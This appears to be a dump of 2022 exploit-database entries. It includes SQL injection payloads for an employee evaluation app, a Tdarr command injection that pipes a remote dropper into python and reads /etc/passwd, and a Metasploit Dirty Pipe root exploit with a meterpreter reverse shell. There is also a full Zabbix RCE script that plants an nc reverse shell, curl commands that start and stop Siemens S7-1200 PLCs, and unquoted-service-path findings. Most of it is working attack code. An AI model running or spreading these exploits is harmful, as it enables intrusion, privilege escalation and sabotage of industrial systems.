<pre><code>## Title: Employee Performance Evaluation v1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 03.11.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/14617/employee-performance-evaluation-system-phpmysqli-source-code.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Employee-Performance-Evaluation<br /><br />## Description:<br />The `email` parameter appears to be vulnerable to SQL injection attacks.<br />A single quote was submitted in the email parameter, and a database<br />error message was returned.<br />Two single quotes were then submitted and the error message<br />disappeared. You should review the contents of the error message, and<br />the application's handling of other input, to confirm whether a<br />vulnerability is present.<br />The attacker can take administrator account control and also of all<br />accounts on this system, also the malicious user can download all<br />information about this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br /><br />---<br />Parameter: email (POST)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: email=YgGZcTAx@sourcecodester.com' AND (SELECT 6536<br />FROM(SELECT COUNT(*),CONCAT(0x71786a7071,(SELECT<br />(ELT(6536=6536,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--<br />iQpA&password=hacked&login=0<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: email=YgGZcTAx@sourcecodester.com' AND (SELECT 2365 FROM<br />(SELECT(SLEEP(5)))lFkz)-- xqup&password=hacked&login=0<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Employee-Performance-Evaluation)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/9q1tni)<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Tdarr 2.00.15 - Command Injection<br /># Date: 10/03/2022<br /># Exploit Author: Sam Smith<br /># Vendor Homepage: https://tdarr.io<br /># Software Link: https://f000.backblazeb2.com/file/tdarrs/versions/2.00.15/linux_arm64/Tdarr_Server.zip<br /># Version: 2.00.15 (likely also older versions)<br /># Tested on: 2.00.15<br /><br />Exploit:<br /><br />The Help tab contains a terminal for both FFmpeg and HandBrake. These terminals do not include input filtering which allows the user to chain commands and spawn a reverse shell.<br /><br />eg. `--help; curl http://192.168.0.2/dropper.py | python` or `--help;whoami;cat /etc/passwd`.<br /><br />Tdarr is not protected by any auth by default and no credentials are required to trigger RCE<br /><br /></code></pre>
<pre><code># Exploit Title: FLEX 1080/1085 Web - Information Disclosure<br /># Exploit Author: Mr Empy<br /># Vendor Homepage: https://www.tem.ind.br/<br /># Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94<br /># Version: 1.6.0<br /># Tested on: Linux<br /><br />Title:<br />================<br />FLEX 1080/1085 Web - Information Disclosure<br /><br />Summary:<br />================<br />The FLEX 1080/1085 Web hardware allows the attacker to obtain sensitive<br />information such as username and password, WiFi SSID and WiFi password.<br /><br /><br />Severity Level:<br />================<br />9.1 (Critical)<br />CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N<br /><br /><br />Vulnerability Disclosure Schedule:<br />============================<br />* January 13, 2022: An email was sent to support.<br /><br />* February 13, 2022: I didn't get any response from support.<br /><br />* February 14, 2022: Vulnerability Disclosure<br /><br /><br />Affected Product:<br />================<br />FLEX 1080/1085 Web v1.6.0<br /><br /><br />Steps to Reproduce:<br />================<br /><br />1. Open a terminal and enter the following command:<br /><br />curl -X POST http://target.com/sistema/log.cgi -d 'force=1'<br /><br />After that you will be able to see the hardware logs without having any<br />authentication.<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ExcellentRanking<br /><br /> include Msf::Post::File<br /> include Msf::Post::Linux::Priv<br /> include Msf::Post::Linux::Kernel<br /> include Msf::Post::Linux::System<br /> include Msf::Post::Linux::Compile<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::FileDropper<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Dirty Pipe Local Privilege Escalation via CVE-2022-0847',<br /> 'Description' => %q{<br /> This exploit targets a vulnerability in the Linux kernel since 5.8, that allows<br /> writing of read only or immutable memory.<br /><br /> The vulnerability was fixed in Linux 5.16.11, 5.15.25 and 5.10.102.<br /> The module exploits this vulnerability by overwriting a suid binary with the<br /> payload, executing it, and then writing the original data back.<br /><br /> There are two major limitations of this exploit: the offset cannot be on a page<br /> boundary (it needs to write one byte before the offset to add a reference to<br /> this page to the pipe), and the write cannot cross a page boundary.<br /> This means the payload must be less than the page size (4096 bytes).<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Max Kellermann', # Original vulnerability discovery<br /> 'timwr', # Metasploit Module<br /> ],<br /> 'DisclosureDate' => '2022-02-20',<br /> 'SessionTypes' => ['shell', 'meterpreter'],<br /> 'Platform' => [ 'linux' ],<br /> 'Arch' => [<br /> ARCH_X64,<br /> ARCH_X86,<br /> ARCH_ARMLE,<br /> ARCH_AARCH64,<br /> ],<br /> 'Targets' => [['Automatic', {}]],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'AppendExit' => true,<br /> 'PrependSetresuid' => true,<br /> 'PrependSetresgid' => true,<br /> 'PrependSetreuid' => true,<br /> 'PrependSetuid' => true,<br /> 'PrependFork' => true,<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> },<br /> 'Privileged' => true,<br /> 'References' => [<br /> [ 'CVE', '2022-0847' ],<br /> [ 'URL', 'https://dirtypipe.cm4all.com' ],<br /> [ 'URL', 'https://haxx.in/files/dirtypipez.c' ],<br /> ],<br /> 'Notes' => {<br /> 'AKA' => [ 'Dirty Pipe' ],<br /> 'Reliability' => [ REPEATABLE_SESSION ],<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK ]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]),<br /> OptString.new('SUID_BINARY_PATH', [ false, 'The path to a suid binary', '/bin/passwd' ])<br /> ])<br /> end<br /><br /> def check<br /> arch = kernel_arch<br /> unless live_compile? || arch.include?('x64') || arch.include?('aarch64') || arch.include?('x86') || arch.include?('armle')<br /> return CheckCode::Safe("System architecture #{arch} is not supported without live compilation")<br /> end<br /><br /> kernel_version = Rex::Version.new kernel_release.split('-').first<br /> if kernel_version < Rex::Version.new('5.8') ||<br /> kernel_version >= Rex::Version.new('5.16.11') ||<br /> (kernel_version >= Rex::Version.new('5.15.25') && kernel_version < Rex::Version.new('5.16')) ||<br /> (kernel_version >= Rex::Version.new('5.10.102') && kernel_version < Rex::Version.new('5.11'))<br /> return CheckCode::Safe("Linux kernel version #{kernel_version} is not vulnerable")<br /> end<br /><br /> CheckCode::Appears("Linux kernel version found: #{kernel_version}")<br /> end<br /><br /> def exp_dir<br /> datastore['WRITABLE_DIR']<br /> end<br /><br /> def exploit<br /> suid_binary_path = datastore['SUID_BINARY_PATH']<br /> fail_with(Failure::BadConfig, 'The suid binary was not found; try setting SUID_BINARY_PATH') if suid_binary_path.nil?<br /> fail_with(Failure::BadConfig, "The #{suid_binary_path} binary setuid bit is not set") unless setuid?(suid_binary_path)<br /><br /> arch = kernel_arch<br /> vprint_status("Detected architecture: #{arch}")<br /> vprint_status("Detected payload arch: #{payload.arch.first}")<br /> unless arch == payload.arch.first<br /> fail_with(Failure::BadConfig, 'Payload/Host architecture mismatch. Please select the proper target architecture')<br /> end<br /><br /> payload_data = generate_payload_exe[1..] # trim the first byte (0x74)<br /> if payload_data.length > 4095<br /> fail_with(Failure::BadConfig, "Payload size #{payload_data.length} is too large (> 4095)")<br /> end<br /><br /> fail_with(Failure::BadConfig, "#{exp_dir} is not writable") unless writable?(exp_dir)<br /> exploit_file = "#{exp_dir}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"<br /><br /> if live_compile?<br /> vprint_status('Live compiling exploit on system...')<br /> exploit_c = exploit_data('CVE-2022-0847', 'CVE-2022-0847.c')<br /> exploit_c.sub!(/payload_bytes.*$/, "payload_bytes[#{payload_data.length}] = {#{Rex::Text.to_num(payload_data)}};")<br /> upload_and_compile(exploit_file, exploit_c)<br /> else<br /> vprint_status('Dropping pre-compiled exploit on system...')<br /> exploit_bin = exploit_data('CVE-2022-0847', "CVE-2022-0847-#{arch}")<br /> payload_placeholder_index = exploit_bin.index('PAYLOAD_PLACEHOLDER')<br /> exploit_bin[payload_placeholder_index, payload_data.length] = payload_data<br /> upload_and_chmodx(exploit_file, exploit_bin)<br /> end<br /><br /> register_file_for_cleanup(exploit_file)<br /> overwrite_file_path = datastore['SUID_BINARY_PATH']<br /><br /> cmd = "#{exploit_file} #{overwrite_file_path}"<br /> print_status("Executing exploit '#{cmd}'")<br /> result = cmd_exec(cmd)<br /> vprint_status("Exploit result:\n#{result}")<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 9/3/2022<br /># Exploit Author: Hussien Misbah<br /># Vendor Homepage: https://www.zabbix.com/<br /># Software Link: https://www.zabbix.com/rn/rn5.0.17<br /># Version: 5.0.17<br /># Tested on: Linux<br /># Reference: https://github.com/HussienMisbah/tools/tree/master/Zabbix_exploit<br /><br />#!/usr/bin/python3<br /># note : this is blind RCE so don't expect to see results on the site <br /># this exploit is tested against Zabbix 5.0.17 only<br /><br />import sys<br />import requests<br />import re <br />import random<br />import string<br />import colorama<br />from colorama import Fore<br /><br /><br />print(Fore.YELLOW+"[*] this exploit is tested against Zabbix 5.0.17 only")<br />print(Fore.YELLOW+"[*] can reach the author @ https://hussienmisbah.github.io/")<br /><br /><br />def item_name() :<br /> letters = string.ascii_letters<br /> item = ''.join(random.choice(letters) for i in range(20)) <br /> return item<br /><br />if len(sys.argv) != 6 :<br /> print(Fore.RED +"[!] usage : ./expoit.py <target url> <username> <password> <attacker ip> <attacker port>")<br /> sys.exit(-1)<br /><br />url = sys.argv[1]<br />username =sys.argv[2]<br />password = sys.argv[3]<br />host = sys.argv[4]<br />port = sys.argv[5]<br /><br /><br />s = requests.Session()<br /><br /><br />headers ={ <br />"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",<br />}<br /><br />data = { <br />"request":"hosts.php", <br />"name" : username ,<br />"password" : password ,<br />"autologin" :"1" ,<br />"enter":"Sign+in"<br />}<br /><br /><br />proxies = {<br /> 'http': 'http://127.0.0.1:8080'<br />}<br /><br /><br />r = s.post(url+"/index.php",data=data) #proxies=proxies)<br /><br />if "Sign out" not in r.text :<br /> print(Fore.RED +"[!] Authentication failed")<br /> sys.exit(-1)<br />if "Zabbix 5.0.17" not in r.text :<br /> print(Fore.RED +"[!] This is not Zabbix 5.0.17")<br /> sys.exit(-1)<br /><br />if "filter_hostids%5B0%5D=" in r.text :<br /> try :<br /> x = re.search('filter_hostids%5B0%5D=(.*?)"', r.text)<br /> hostId = x.group(1)<br /> except :<br /> print(Fore.RED +"[!] Exploit failed to resolve HostID")<br /> print(Fore.BLUE +"[?] you can find it under /items then add item")<br /> sys.exit(-1)<br />else :<br /> print(Fore.RED +"[!] Exploit failed to resolve HostID")<br /> print(Fore.BLUE +"[?] you can find HostID under /items then add item")<br /> sys.exit(-1)<br /><br /><br />sid= re.search('<meta name="csrf-token" content="(.*)"/>',r.text).group(1) # hidden_csrf_token<br /><br /><br />command=f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {host} {port} >/tmp/f"<br /><br />payload = f"system.run[{command},nowait]"<br />Random_name = item_name()<br />data2 ={<br /> <br />"sid":sid,"form_refresh":"1","form":"create","hostid":hostId,"selectedInterfaceId":"0","name":Random_name,"type":"0","key":payload,"url":"","query_fields[name][1]":"","query_fields[value][1]":"","timeout":"3s","post_type":"0","posts":"","headers[name][1]":"","headers[value][1]":"","status_codes":"200","follow_redirects":"1","retrieve_mode":"0","http_proxy":"","http_username":"","http_password":"","ssl_cert_file":"","ssl_key_file":"","ssl_key_password":"","interfaceid":"1","params_es":"","params_ap":"","params_f":"","value_type":"3","units":"","delay":"1m","delay_flex[0][type]":"0","delay_flex[0][delay]":"","delay_flex[0][schedule]":"","delay_flex[0][period]":"","history_mode":"1","history":"90d","trends_mode":"1","trends":"365d","valuemapid":"0","new_application":"","applications[]":"0","inventory_link":"0","description":"","status":"0","add":"Add"<br />}<br /><br />r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"} )<br /><br /><br />no_pages= r2.text.count("?page=") <br /><br />#################################################[Searching in all pages for the uploaded item]#################################################<br />page = 1<br />flag=False<br />while page <= no_pages :<br /> r_page=s.get(url+f"/items.php?page={page}" ,headers=headers )<br /> if Random_name in r_page.text :<br /> print(Fore.GREEN+"[+] the payload has been Uploaded Successfully")<br /> x2 = re.search(rf"(\d+)[^\d]>{Random_name}",r_page.text)<br /> try :<br /> itemId=x2.group(1)<br /> except :<br /> pass<br /><br /> print(Fore.GREEN+f"[+] you should find it at {url}/items.php?form=update&hostid={hostId}&itemid={itemId}")<br /> flag=True<br /> break <br /><br /> else :<br /> page +=1<br /><br />if flag==False :<br /> print(Fore.BLUE +"[?] do you know you can't upload same key twice ?")<br /> print(Fore.BLUE +"[?] maybe it is already uploaded so set the listener and wait 1m")<br /> print(Fore.BLUE +"[*] change the port and try again")<br /> sys.exit(-1)<br /><br />#################################################[Executing the item]#################################################<br /><br /><br />data2["form"] ="update"<br />data2["selectedInterfaceId"] = "1"<br />data2["check_now"]="Execute+now"<br />data2.pop("add",None)<br />data2["itemid"]=itemId,<br /><br />print(Fore.GREEN+f"[+] set the listener at {port} please...")<br /><br />r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"}) # ,proxies=proxies )<br /><br />print(Fore.BLUE+ "[?] note : it takes up to +1 min so be patient :)")<br />answer =input(Fore.BLUE+"[+] got a shell ? [y]es/[N]o: ")<br /><br />if "y" in answer.lower() :<br /> print(Fore.GREEN+"Nice !")<br />else :<br /> print(Fore.RED+"[!] if you find out why please contact me ")<br /><br />sys.exit(0)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Unauthenticated Siemens S7-1200 CPU Start/Stop Command<br /># Date: 09/03/2022<br /># Exploit Author: RoseSecurity<br /># Vendor Homepage: https://www.siemens.com/global/en.html<br /># Version: V4.5 and below<br /># Tested on: Siemens S7-1200 (CPU: 1215C)<br /><br /># IP == PLC IP address<br /><br /># Start Command<br /><br />curl -i -s -k -X $'POST' \ -H $'Host: <IP>' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://<IP>' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http://<IP>/Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' \ -b $'siemens_automation_no_intro=TRUE' \ --data-binary $'Run=1&PriNav=Start' \ 'http://<IP>/CPUCommands'<br /><br /># Stop Command<br /><br />curl -i -s -k -X $'POST' \ -H $'Host: <IP>' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://<IP>' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http://<IP>/Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' \ -b $'siemens_automation_no_intro=TRUE' \ --data-binary $'Run=1&PriNav=Stop' \ 'http://<IP>/CPUCommands'<br /><br /></code></pre>
<pre><code># Exploit Title: WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path<br /># Exploit Author: Antonio Cuomo (arkantolo)<br /># Exploit Date: 2022-03-09<br /># Vendor : ilwebmaster21<br /># Version : WOW21_Service 5.0.1.9<br /># Vendor Homepage : https://wow21.life/<br /># Tested on OS: Windows 10 Pro x64<br /><br />#PoC :<br />==============<br /><br />C:\>sc qc WOW21_Service<br />[SC] QueryServiceConfig OPERAZIONI RIUSCITE<br /><br />NOME_SERVIZIO: WOW21_Service<br /> TIPO : 10 WIN32_OWN_PROCESS<br /> TIPO_AVVIO : 2 AUTO_START<br /> CONTROLLO_ERRORE : 1 NORMAL<br /> NOME_PERCORSO_BINARIO : C:\Program Files\WOW21\WOW21_Service.exe<br /> GRUPPO_ORDINE_CARICAMENTO :<br /> TAG : 0<br /> NOME_VISUALIZZATO : WOW21_Service<br /> DIPENDENZE :<br /> SERVICE_START_NAME : LocalSystem<br /><br /></code></pre>
<pre><code># Exploit Title: Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path<br /># Exploit Author: Antonio Cuomo (arkantolo)<br /># Exploit Date: 2022-03-09<br /># Vendor : David Xanatos<br /># Version : SbieSvc 5.50.2<br /># Vendor Homepage : https://sandboxie-plus.com/<br /># Tested on OS: Windows 10 Pro x64<br /><br />#PoC :<br />==============<br /><br />C:\>sc qc SbieSvc<br />[SC] QueryServiceConfig OPERAZIONI RIUSCITE<br /><br />NOME_SERVIZIO: SbieSvc<br /> TIPO : 10 WIN32_OWN_PROCESS<br /> TIPO_AVVIO : 2 AUTO_START<br /> CONTROLLO_ERRORE : 1 NORMAL<br /> NOME_PERCORSO_BINARIO : C:\Program Files\Sandboxie-Plus\SbieSvc.exe<br /> GRUPPO_ORDINE_CARICAMENTO : UIGroup<br /> TAG : 0<br /> NOME_VISUALIZZATO : Sandboxie Service<br /> DIPENDENZE :<br /> SERVICE_START_NAME : LocalSystem<br /><br /></code></pre>
<pre><code># Exploit Title: McAfee® Safe Connect VPN - Unquoted Service Path Elevation Of Privilege<br /># Date: 09/03/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.mcafee.com/<br /># Software Link: https://www.mcafee.com/en-us/vpn/mcafee-safe-connect.html<br /># Version: 2.13<br /># Tested: Windows 10 x64<br /># Contact: https://twitter.com/dmaral3noz<br /><br />C:\Users\saudh>sc qc SafeConnectService<br /><br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: SafeConnectService<br /><br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\McAfee\McAfee Safe Connect\SafeConnect.ServiceHost.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : McAfee Safe Connect Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />#Exploit:<br /><br />A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.<br /><br /></code></pre>
<pre><code># Exploit Title: BattlEye 0.9 - 'BEService' Unquoted Service Path<br /># Date: 09/03/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.battleye.com/<br /># Software Link: https://www.battleye.com/downloads/<br /># Version: 0.94<br /># Tested: Windows 10 Pro <br /># Contact: https://twitter.com/dmaral3noz<br /><br /><br />C:\Users\saudh>sc qc BEService<br /><br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: BEService<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 3 DEMAND_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\BattlEye\BEService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : BattlEye Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />#Exploit:<br /><br />A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.<br /><br /></code></pre>